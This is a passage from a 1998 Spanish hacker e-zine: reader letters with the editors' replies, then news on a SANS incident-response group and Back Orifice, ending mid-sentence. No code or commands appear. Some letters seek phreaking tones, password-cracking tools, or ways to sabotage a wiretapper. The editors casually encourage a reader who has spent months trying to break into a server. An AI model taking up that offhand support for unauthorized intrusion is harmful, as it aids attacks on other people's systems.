<ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: c_plaza@xxxxxxxxxxxxxx To: jjf_team@usa.net Subject: informarles y agradecimiento un saludo antes que nada y gracias por la informacion que brindan a todos los cibernautas de este planeta. me dirijo en la oprtunidad de avisarles que tengo una pagina en la cual he utilizado fragmentos de sus composiciones asi como tambien les recomiendo a las personas que visiten mi pagina, que para mayor informacion se dirijan a la pagina de ustedes. mi pagina es http://www.geocities.com/Heartland/Plains/3102 nota: espero que si esta en la posibilidad de ustedes me sirvan dar algunos consejos. att. Carlos Plaza <------> [ Okis :) ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: plaxius To: jjf_team@usa.net Subject: ¡¡Proyecto_R !! Hola estimados : Un gustazo saludarlos de nuevo , y felicitarlos ya que el numero cuatro estubo fantastico y parece que esto suma y sigue . Bueno solo queria contarles que ya hemos terminado el primer nuemro de Proyecto_R , los invito a que nos den su sincera opinion y criticas ojala constructivas , para que nos ayuden a mejorar ciertos aspectos del E-Zine la verdad es bastante pobre (creo yo ) pero tendra que ir mejorando a medida que se nos unan mas colaboradores . Les adjunto el primer numero y si puden poner un enlze desde vuestro web como tambien mencionar la direccion en su E-Zine , estaria eternamente agradecido ... URL Proyecto_R : http://www.bigfoot.com/~proyecto_r http://www.geocities.com/colosseum/sideline/9497 GRacias ...---- PlaXiuS . <------> [ Claro que os ponemos un enlace :) y a todos nuestros lectores decirles que pasaros por el url y pillad este nuevo ezine. Nos ha gustado mucho el ezine y esperamos que siga mejorando. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: "SPIDER" Subject: saludo Les envio un saludo, y felicitaciones por su magnifica pag. Espero que esto lo hagan aun mas grande, es genial hasta pronto... ATTE: SPIDERIDER <------> [ thx, estamos en ello. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Sun, 02 Aug 1998 13:05:55 GMT From: "Alfredo Kreim" To: conde_vampiro@usa.net Subject: Ayuda Estimado Conde Vampiro: No soy ni H/P/C ni nada que se le parezca. Ni siquiera soy un Lamer. Mi actividad es el periodismo de investigacion (corrupcion politica, negociados turbios, etc.). Por supuesto que esto molesta a algunos y es por eso que me dirijo a uds. para preguntarles si me pueden dar alguna ayuda. Tengo mis lineas telefonicas pinchadas, o sea escuchan mis conversaciones. Algunas son importantes para descubrir cosas sucias y corren peligro mis fuentes de informacion si son identificadas. Mi requerimiento es: existe algun programa (tengo una Pentium 100 con Windows 95) que me permita escudri¤ar la linea y poder detectar si me estan grabando o interceptando la comunicacion?. De no existir, conocen algun dise¤o electronico que permita construir algun rastreador (que tenga componentes baratos ya que mi cuenta esta vacia)?. Es posible una vez detectado el hijo de puta fizgon mandarle algo para que no joda mas?. Desde ya les agradezco todo lo que puedan hacer para darme una ayuda. Lamento no saber Unix, y tambien lamento no ser mas joven. Ya cerca de los 50 me resulta un tanto pesado estudiar, aunque trato de leer algo nuevo de programacion todas las veces que puedo. Tengo la oportunidad ahora de leer un par de libros para empezar a programar en Java. Me gustaria me dieran su opinion si vale la pena o mejor me dedico a seguir persiguiendo politicos sucios. Por ultimo, mi ingles tecnico no es demasiado abultado, por ello si encuentran algo en castellano mejor. Un abrazo y sigan asi. Me gusta mucho leer la pagina JJF Hackers Team. Chau. Alfredo. <------> [ Esto me suena a peli de James Bond :), pues decirte que hay varias empresas que se dedican a estos asuntos. En barcelona y en Madrid tienes unas tiendas llamadas LA TIENDA DEL ESPIA, en la que podras comprar encriptadores para las conversaciones telefonicas y mas juguetes. Y que no te cojan alfredo :) ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Tue, 04 Aug 1998 19:03:52 GMT From: Sergio To: conde_vampiro@usa.net Subject: Hola COnde Hola soy Sergio y me interesaria un buen programa para pasarme los passwords que me piden las web porno, tengo WINDOWS95 ya me diras alguna cosa gracias soy carlos29@xxxxxxxxxxxxxx Adios <------> [ Por favor !!!!! tenemos mejores cosas que hacer. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: "Pablo Garcia del Pino" To: jjf_team@usa.net Subject: Problemas en tus URL Tio: Muy buena pagina la tuya pero... cuando vas a bajarte por ejemplo los tonos de la red-box, informacion para red-box etc... Te encuentras el error 404 es decir que el link de URL no existe. Por favor, este tema me interesa bastante, con lo que a ver si pudierais enviarme estos archivos, o si no decirme como conseguirlos. Gracias. Icelord http://www.pasanet.es/usuarios/icelord/ icelord@xxxxxxxxxxxxxx <------> [ Ya decimos que los linkïs en los webïs son dificl de mantener, pero el webmaster hace lo que puede. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Fri, 14 Aug 1998 18:45:35 GMT From: Cain To: jjf_team@usa.net Subject: Para el e-zine ( Correo del lector) Sonara muy tipico.. pero felicidades por vuestra pagina, y gracias por ense¤arnos.... Bueno mejor voy al grano ok? Bien en el e-zine he visto que explicais cosas sobre el hacking, pero siempre bajo Unix. A alguien se le ha ocurrido la idea de hacerlo desde Windows? ( No os riais de mi please ) Soy consciente de que a muchos programadores la simple idea de trabajar con windows les parece ridicula, y que consideran que es un sistema para supernovatos... y tal vez sea asi, pero tambien es verdad que se puede hacer hacking desde windows ¨o no? La se¤orita Carolyn Meinel asi lo explica, y el se¤or IPgh0st hace la traducion de dichos documentos... entonces.. porque no se amplia mas sobre el tema? ¨Son conscientes de que para millones de usuarios, que usan Windows por motivos varios les seria mucho mas facil trabajar desde este "¨Sistema?" ( Lo pongo entre comillas para que nadie se me ofenda ok?) Bueno pues lo dicho, creo que seria interesante abarcar esa posibilidad, aqunue soy consciente que es una tarea un tanto pesada... Igualmente estoy convencido que se haria un gran favor a los aprendices de hackers ( Incluyendome entre ellos). Gracias por dedicar su tiempo a mi e-mail, y espero seguir disfrutnado de su informacion, y de sus sabios consejos. And he exilied me To wander in darkness The land of Nod I flew into the darkness I saw no source of light And I was afraid And Alone. Fragment of Book of Nod. Cain. <------> [ Thx, ¨ Pero quien dice que no tocamos nada sobre windows ?, pues seguro que este numero te gustara :), ademas nosotros estamos trabajando en varios proyectos para windows que iran saliendo durante este a¤o. Pero esperamos que los lectores tambien nos envien articulos sobre windows. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Mon, 17 Aug 1998 19:28:58 GMT From: "ZeD" Subject: varias cosas hola os mando esto para deciros varias cosas,la primera es que lei una carta de un lector en el n§5 de la revista,que decia que le gustaria que en vuestro e-zine saliese una especie de "dicciohack",la verdad es que no me parece mala idea,ya que muchos de los terminos que se usan cambian de nombre y ademas no siempre se conocen todos,ya que salen nuevos cada muy poco tiempo. en segundo lugar queria comentar a todos los que os escriben diciendoos que quieren aprender hackear,que si lo haces bien,le pones empe¤o ypor supuesto no es una "vena" transitoria de esas que nos dan a todos de vez encuando despues de leer o ver alguna aza¤a en television o en algun periodico,no es tan dificil aprender y desde este como desde muchos e-zines y webs podeis ir aprendiendo (poco a poco claro,esto noes algo que se prenda en dos semanas),existen mogollon de libros sobre seguridad informatica,sistemas operativos...ect... que si los lees,puedes parender muchas cosas,ademas ¨no dicen que en internet esta todo? pues buscad guias de iniciacion o documentos para "newbyes" (o como co¤e se scriba la palabreja esa). la tercera cosa que queria comentaros es una cuestion que me preguntaron el otro dia en un canal de irc y la verdad es que no supe contestarte,la pregunta que me hicieron es la siguiente: "¨se puede hackear (se referia a entrar en un sistema,obviamente) desde windows95?" yo la verdad es que no lo se y apartir de que me hizieran esa pregunta,a mi tambien me corroe la curiosidad,como ya se que si se puede no vais a decir el como,no os lo pregunto,simplemente me gustaria un "si" o un "no" ;-) mas cosillas,como decis vosotros sin colaboracion no hay trabajo,por lo tanto les mando tres textos para que,si quereis los incluyais en el proximo n§ de vuestro e-zine.el primero es sobre como trucar el windows95,aqui explico la manera de adecuar el SO mas utilizado (por desgracia o por fortuna,segun para quien),al gusto del usuario y no al de los creadores del jodio sistema en cuestion. el segundo es una especie de guia para el irc en la que explico como conseguir cosas (contrase¤as...etc...) por medio de ingenieria social,tambien incluye una peque¤a guia de como usar dos de las tools que hay para los famosos PWL. el tercer texto va dedicado a los phreackers novatos o gente que se quiera iniciar en este campo,entre las cosas que se comentan en este texto incluyo una descripcion de algunas de la BOX mas conocidas.os los mando los 3 comprimidos en un zip para que ocupen menos y no tardeis mucho en bajaros este e-mail. deciros que soy miembro del grupo HaCk`S-wEb-RiNg y que siempre que sale un nuevo n§ de vustro e-zine lo pillamos rapidamente por que mola mazo y deciros que en nombre de todo el grupo,os mandamos un saludo,si quereis visitar nuestra web.... lo llevais claro por que todavia esta "under construccion" pero ya le falta menos y cuando este acabado en los link`s pondremos uno a vuestra web,que mola mazo ¨fale? :-) por cierto (ya acabo) en algunos e-zines (no voy a decir cuales) tienen una "lista de correo" en la que avisan cuando sale un nuevo n§ ¨por que no haceis vosotros lo mismo? bueno siento averos dado la barrila pero he tardado en decidirme a escribiros y ahora lo suelto todo de golpe ;-) un saludo y feliz HaCk (esto me suena) bye { ZeD ----- http://www.angelfire.com/ak/HACKZED/ZED2.html ------ } esta es la direccion de mi web,por si la quereis poner en el e-zine <------> [ Sobre un diccionario hack ya hemos pensado sobre ello y mas adelante ya veras :) Decirte sobre win95 "SI". Sobre el mailing list estamos en ello, pero no hemos dicho nada ya que dentro de poco habra cambios radicales en el website ;-) Thx por tus artis y nos gusta que otros grupos nos apoyen, saludos de - J.J.F. / HACKERS TEAM -, por cierto hemos visto tu ezine y tu web :) y decirte que este ezine se llama J.J.F. / HACKERS TEAM JOURNAL. byes ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: "Pepe Pepe2" To: conde_vampiro@usa.net Subject: Sir Ich Hola conde soy Sir Ich, estoy leyendome los articulos que realizas sobre hackers y quisiera saber si podrias decirme algun texto mas donde empezar porque quiero aprender en esto del hack. Por cierto me gustaron bastante tus articulos. Lo que me gustaria es que me ense¤aras o que me dieras consejos o textos sobre como empezar en esto del hack. Bueno sin mas me despido hasta la proxima esperando tu respuesta. Muchas gracias por leer esta carta y por haberme atendido. Mi correo es sir_ich@xxxxxxxxxxxxxx <------> [ Bueno pues logicamente tienes nuestro/vuestro ezine que es un medio ideal para aprender, pero no solo de textos vive el hacker :) Nuestro consejo es el de siempre, estudia, aprende y mejora las cosas. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Tue, 18 Aug 1998 16:54:02 GMT From: "Alfredo Kreim" To: conde_vampiro@usa.net Cc: mr.electro@usa.net Subject: Ayuda Muchachos, estoy en un problema. Soy periodista y hago notas investigando a politicos corruptos, policias corruptos, jueces corruptos, en fin, a toda la lacra que anda dando vueltas por ahi. Descubri que me pinchan mis lineas telefonicas y escuchan y graban mis conversaciones, lo que -por supuesto- me jode y ademas pone en riesgo a mis informantes (gente decente que cree que los hijos de puta tienen que estar en una jaula y los buenos disfrutar la vida). Primera pregunta: ¨hay algun programa que me permita descubrir con certeza la pinchadura y localizar al espia?. Segunda pregunta: Si existe, ¨es posible bloquear e impedir que me escuchen y graben?. Tercera pregunta: ¨Hay manera de romperles el culo cagandoles el equipo que estan usando?. Cuarta pregunta: Si todo lo anterior es negativo, ¨habra por ahi planos y manuales en castellano para construir algun aparatito electronico que realice la tarea descripta mas arriba?. Si necesitan mas datos acerca del tipo de central y equipos que tiene la proveedora del servicio telefonico, avisenme que lo averiguo y se los paso. Muchas gracias desde ya, y quedo a la espera de alguna novedad de uds. Un abrazo. Alfredo <------> [ Otra vez el espia !!! Pues ya te hemos dado la respuesta mas arriba, y estas cosas si que se pueden realizar pero tienes que ser un manitas en phreaking y por supuesto electronica, hhhuum cosa que veo dificil. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Sun, 23 Aug 1998 15:30:31 GMT From: "ADRIAN" Subject: me_gusta_mucho_la_presentacion__ Bueno tienen un monton de programas buenisimos,y actuales, se ven poco por la red asi que sigan adelante muchachos ,otra cosa me mandan la direccion de la pagina en internet? es que la encontre en un buscador cabron que no me deja ver la direccion.. <------> [ Pues facil, cuando te pones encima de nuestro enlace en ese buscador seguro que te sale nuestro url abajo a la izquierda en tu navegador. Ademas si pinchas encima te sale nuestro url en el prompt del navegador y encima nuestro url sale en nuestro ezine, creo que mas facil no se puede :) ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Sat, 29 Aug 1998 08:20:37 GMT From: "Ana Maria Hermida" To: conde_vampiro@usa.net Hola Estoy algo desesperado y no se que hacer. Llevo mas de 5 meses intentando entrar en un server. He sacado mucha informacion sobre los ordenadores que estan en su red (tengo mas de 20) y sobre los protocolos que otiliza en cada uno de sus puertos, asi como los dorectorios que exporta. Pero parece que todas las versiones estan libres de bugs ... que puedo hacer? como podria entrar en alguno de esos server? En todos los manuales y articulos de las revistas pone que es muy facil y blablabla pero yo no consigo nada ... y eso que tengo buenos conocimientos de informatica :( Me puedes echar una mano? gracias <------> [ Pues que decir, no conozco ningun sistema perfecto libre de bugs. No estaras enfocando correctamente la situacion, revisa a fondo toda la informacion que has recopilado. Pero si tan frustado estas mejor dejalo, en el hack no todo son alegrias y exitos. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Sat, 29 Aug 1998 09:57:42 GMT From: "ZeD" Subject: virus muy raro hola vereis no se si os acordareis de mi (os mande tres textos hace una dos o tres semanas) tengo un "peque¤o" problema con algo que creo puede ser un virus a ctualmente estoy usando el WINDOWS95 y hoi (29/8/98) se me a activado lo que creo puede ser un virus lo que hace este es lo siguiente al abrir cualquier cosa con el NOTEPAD (solo con el note,con el wordpad no me pasa nada) la pantalla se me llena de iconos de error (el del windows que es un circulo rojo con una "X" blanca en medio) estos los puedo "borrar" si paso por encima de ellos el documento que he abierto me pasa lo mismo cuando intento conectarme a internet y tambien los puedo borrar si paso el cuadro de dialogo (el de "conectando a internet") por encima de ellos. actualmente uso el antivirus ANYWARE y este no me detecta nada raro y la verdad no se de que virus se puede trar y mucho menos como eliminarlo. yo la verdad es que de virus no tengo ni idea,por eso recurro a vosotros aver si,vosotros o alguno de vuestros lectores saben como poder ayudarme con el "virus" (o lo que sea). si vosotros no podeis ayudarme y publicais esto en el e-zine poned esta direccion de correo para que me contesten (si alguien sabe la respuesta claro) la dire es: zed@mixmail.com bueno,no os aburro mas un saludo \\'// (o -) -ooO--(_)--Ooo- --..--ZeD--..-- http://www.angelfire.com/ak/HACKZED/ZED2.html http://come.to/HaCkS-wEb-RiNg !visitalas¡ !!EL DIA 3/9/98 TODOS A LA HUELGA¡¡ <------> [ Es la primera vez que oigo semejante historia, si esto es un virus lo desconozco pero huele mas al tipico programa bromista de win95, has mirado en Inicio o en el registro, en busca de algo sospechoso. ? Si algun lector reconoce estos sintomas pues que nos escriba. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Sun, 30 Aug 1998 16:58:52 GMT From: Muerte To: jjf_team@usa.net Subject: Red IRC Union Latina NecroSaludos, Pueeee... no habia descubierto su e-zine hasta hace poco, y ke esta muuu bien y es muu interesante. A parte, me gustaria incluir un link a su pagina, pues eso dense una vuelta por la web de abajo del tooo (si la de Necronomicon...) y se meten en la Guia de Temas Olvidados y luego en A¤adir un Enlace y rellenan el formulario, pa meterles un enlace dentro de la seccion Red. Ke porke no se lo meto yo... pues porke no se ke descripcion meterles, y como ya hice con SET les escribe un e-mail y les dije ke me dijesen una descripcion, y luego yo la meto... A parte de esto... pasando al tema ke me ocupa. Seguro ke ustedes conocen mazo de redes de IRC, pero Hispanas, pueee seguro ke conocen el IRC-Hispano, ¿pero y a parte de esa?, ninguna tal vez, pues yo les escribo esto pa decirles ke hay una alternativa al IRC-Hispano y se llama... Union Latina, sus servers son los siguientes: Union Latina: Comunet (ES, Bilbao): comunet.unionlatina.org Union Latina: Digital (ES, Madrid): madrid.unionlatina.org Union Latina: Dragonet (ES, Alicante): dragonet.unionlatina.org Union Latina: Interlink (ES, Madrid): interlink.unionlatina.org Union Latina: Lander (ES, Madrid): lander.unionlatina.org Union Latina: Telebase (ES, Alicante): telebase.unionlatina.org Union Latina: Tinet (ES, Tarragona): tinet.unionlatina.org Su pagina web oficial es: http://www.unionlatina.org Su bot es KaOs, y no tiene nada ke ver con el amigo Scytale. Pues pa ke les interesa esto, seguro ke hay mazo de gente, como yo, ke somos usuarios de proveedores de bancos y ke tenemos la entrada prohibida (G-Line) al IRC-Hispano o ke estamos hasta los güevos de tanto IRC-Hispano... Pues ya tienen una alternativa real. Seguro ke si se dan una vuelta les convence... Pues nada solo keria ke dieran a conocer esta info en su e-zine, si pa ke la gente sepa ke hay una alternativa a la Red IRC-Hispano. Y ke esta muy bien esa alternativa se llama Union Latina y sus IRCops son muuu majos. Pues naaa maxx... si puedo ayudarles en algo diganmelo.. y sigan asi y pa mas arriba... Mushas gracias por tooo y sigan asi... Un Saludo de Muerte (Director del Necronomicon) NECRONOMICON (El Libro de los Muertos) http://members.xoom.com/necrolibro EN EL IRC: Nick: |Muerte Lugar: #necronomicon en Union Latina Todos los sabados y domingos sobre las 16:00 <------> [ Thx pero nosotros ya conociamos la existencia de esta red de IRC en Espa¤a junto con la de Hispanos y otras academicas. Pero para el que no lo sepa ya no tiene excusa :) ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ------------------------ - NOTICIAS UNDERGROUND - ------------------------ - J.J.F. / HACKERS TEAM - <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> INDICE DE LAS NUEVAS Guide to (mostly) Harmless Hacking # Vol. 5 Programmers' Series No. 2: Shell Programming: an Exploit Explained, Part 1 # Vol. 5 Programmers' Series No. 2: Shell Programming: an Exploit Explained, part 2 # Vol. 5 Programmers' Series No. 3: More on Advanced Unix Shell Programming # Microsoft-only version Number 1 Getting Serious with Win95 # Microsoft-only version Number 2 Hacking with Win95/NT: Batch File Programming # Microsoft-only version Number 3 Hacking with Win95/NT: How to Telnet How to Break into a Windows 95 Computers from the Internet # Vol. 3 No. 7, Part 1 Introduction to Computer Viruses # Vol. 3 No. 7, part 2 Introduction to Computer Viruses # Vol. 6 Real Hackers No. 2: Harold Willison # Vol. 3 No. 8, Part 1 The Magical Mystical Crypto-Primer # Vol. 3 No. 8, Part 2 The Magical Mystical Crypto-Primer <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ¨ QUIEN SE QUIERE PROTEGER DE LOS HACKERS ? EL GRUPO SHADOW LO SABE. OTC 7/23/98 8:25 AM WASHINGTON, D.C., U.S.A., 1998 JUL 23 (Newsbytes) -- By Shawn P. McCarthy, Government Computer News. Los Hackers han ayudado a romper las redes del gobierno. Ellos comparten sus recursos y tecnicas en determinadas listas de correo y en areas de chat encriptadas. Los adminstradores de seguridad del Gobierno Americano estan formando grupos similares para combatir de una forma mas eficaz a los intrusos. Un peque¤o grupo de experto en seguridad del gobierno han estado usando este metodo con el sector opuesto de la industria. El intercambio a servido para formar un concenso, no del todo aceptado, sobre que hacer cuando una red privada a sido penetrada por un intruso via Internet. El grupo Shadow incluye representantes de diferentes departamentos de defensa, Laboratorio Nacional de los Alamos. Los representantes corporativos provienen desde General Dynamics Corp hasta Disney Online. Dos grandes esfuerzos han sido obtenidos en este proceso. El primero es un libro: Computer Security Handling Step by Step. Publicado por Sans Institute of Bethesda, Md., disponible en http://www.sans.org, el libro cuesta $27 y discute como combatir a un intruso, ataques denial of service, cyberladrones y otros temas de seguridad. El libro cita seis estados de responsabilidad: preparacion, deteccion, contencion, eradicacion, recuperacion y seguimiento. Pero se enfoca mas en la parte de preparacion. Hace hincapie otra vez en proteger la red antes de que sea atacada. El grupo Shadow encontro que un buen lugar para empezar es justificar un gasto para invertir en una infraestuctura de seguridad. Tambien encontro que muchos sitios no tienen una solida politica de seguridad o incluso una filosofia en vez, que relentiza y complica las cosas cuando los incidentes ocurren. "Cada uno debe escoger la filosofia que ahi que seguir y conseguir presupuesto," dice Northcutt, antes de formular un plan de responsabilidad. Y el grupo aprendio que todos necesitan entrenamiento en el area de seguridad. El grupo decidio que lo que funciona con organizaciones grandes no siempre funciona con las peque¤as. Grupos grandes han dedicado personal para contener los incidentes. Las peque¤as generalmente emplean a un solo miembro cuando ahi indicios de penetracion. Un inadecuado administrador de red, por exemplo, puede estar usando una cuenta privilegiada que el administrador nunca haya usado antes. Eso le daria pistas al intruso de que ha sido descubierto, por lo que el intruso podria destruir las evidencias y causar otro tipo de da¤os. Las discusiones del grupo Shadow revelan los puntos de los ataques Hackers. Los miembros coinciden en las maneras de como combatir contra codigo malicioso (usando antivirus, scanners para paquetes inexplicables enviados automaticamente desde tu red hacia Internet). Ellos tambien coinciden en realizar pruebas y network mapping (probando uno mismo puede aprender muchisimo sobre el funcionamiento de su red). Ellos tambien discuten sobre denial of service (estableciendo una facilidad de backup), organizaciones de espionaje (seguir el trafico, incluso falsificar informacion para despitar al intruso), hoaxes (mantener a los empleados informados, por ejemplo en http://ciac.llnl.gov), y acceso no autorizados (restringir las conexiones IP permitidas). Sorprendentemente, Northcutt dijo que el no esta muy concenciado de ataques con scriptïs en algunos sitios. "La busqueda de informacion es la mejor forma de concerciarme" dice el. "En varios casos, hemos notado varios intentos de ataques, que indicaban que el intruso conocia la estructura de nuestro sistema." Los departamentos del DOD acuden rapidamente a sus equipos de respuesta ante incidentes informaticos para recibir ayuda inmediata. Un ejemplo de esto, esta en http://www.assist.mil El segundo resultado que concluyo el grupo Shadow se llama Cooperative Intrusion Detection Evaluation and Response project o tambien conocido como CIDER. Tambien un projecto del Instituto Sans, con la cooperacion de la Marina, con el fin de ayudar a las organizaciones a construir defensas propias. El CIDER se concentra en dos tecnicas. La primera es el TCPdump, un programa que monotoriza y filtra la actividad TCP a base de unas reglas cuando aparece un problema. La segunda es Network Flight Recorder, un conjunto de herramientas todavia en desarrollo para monotorizar, archivar y alertar a las autoridades. Los detalles del CIDER estan disponibles en http://www.nswc.navy.mil/ISSEC/CID/ . Cuando lo visitas, se puede bajar una copia shareware. Pero a causa de la cantidad de log's que genera, es recomendable a¤adir mas cantidad de disco duro para que funcione correctamente. La herramienta viene con una buena documentacion. Finalmente, lleva en mente que no en todos los casos de recuperacion resultan ataques de hackers. Casos externos tambien incluyen desastres naturales, descuidos y fallos en los equipos. Teniendo un plan de responsabilidad y un plan de recuperacion es el primer paso para controlar la perdida de servicio. Para una lista de herramientas de seguridad, visitar http://www.perl.com/latro Para monotorizar un grupo de UseNet que discute sobre temas de seguridad, comprobar las comp.sys.www.security o comp.infosystems.www.cgi Ver The Best of Security en best-of-security@requestcyber.com.au o en los diferentes equipos del CERT, cert-advisory-request@cert.org Shawn P. McCarthy es un periodista informatico, webmaster y programador de Internet para Cahners Business Information Inc. Reported by Government Computer News: http://www.gcn.com <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> LA LUCHA POR LA HABILIDAD AUMENTA. 12Aug98 USA: RANDOM NEWSBYTES - By Tony Waltham La semana pasada los hackers se reunieron en las vegas en una conferencia conocida como Defcon VI, pero por lo general el evento no tiene mucha publicidad excepto en esta ocasion que a sido de principal noticia en CNN, ZDNet y la revista Wired cuando un grupo de hackers que se autodenominan "the Cult of the Dead Cow" anuncio una nueva potente herramienta que permite el acceso remoto a maquinas Windows 95 o 98. Esta utilidad autocontenida y que se instala por si misma permite a sus usuarios controlar y monotorizar ordenadores que corren el sistema operativo Windows en una red. Y este software puede ser obtenido de forma gratuita en Internet. Conocida como Back Orifice, ironicamente parecido al BackOffice de Microsoft, principalmente provee unas potentes capacidades para el hacking que pueden ser usadas contra cualquier ordenador con la plataforma Windows. Microsoft respondio de inmediato restando importancia en las capacidades de Back Orifice, mientras que un experto en seguridad de Microsoft dijo que el programa no representa un gran problema a los usuarios finales de Windows. Back Orifice es solo otra herramienta que un administrador puede instalar en una red para monotorizar esta... para examinar el sistema, explico. Por otro lado, la revista Wired indica que esta postura es demasiado blanda, y publico un analisis de un consultor independiente de seguridad llamado Weld Pond, del grupo L0Pht Heavy Industries con sede en Boston (la cual es una organizacion hacker) que contradice la opinion de Microsoft. Diciendo: "Se puede controlar el sistema de ficheros y tambien el registro - es realmente sencillo... (usa) un interface de web... Se puede subir cualquier fichero en el sistema o bajar cualquier fichero desde cualquier sitio en Internet." Lo que esta herramienta pone de manifiesto es el alto riesgo que demuestran ser las redes de ordenadores y sus estandar para los hackers. Desafortunadamente, al ser una herramienta tal facil provocara un crecimiento en entradas ajenas a los ordenadores, en vez de estimular una mayor vigilancia en los usuarios, provocando una mayor vulnerabilidad en las redes informaticas. La Defcon VI atrajo a unos 1.000 hackers (ademas de would-b hackers), pero su numero aumenta por el mundo entero. Consultores expertos en seguridad han dicho que ahora existen unos 50.000 hackers, mientras que algunos estiman mas incluso, especialmente si se 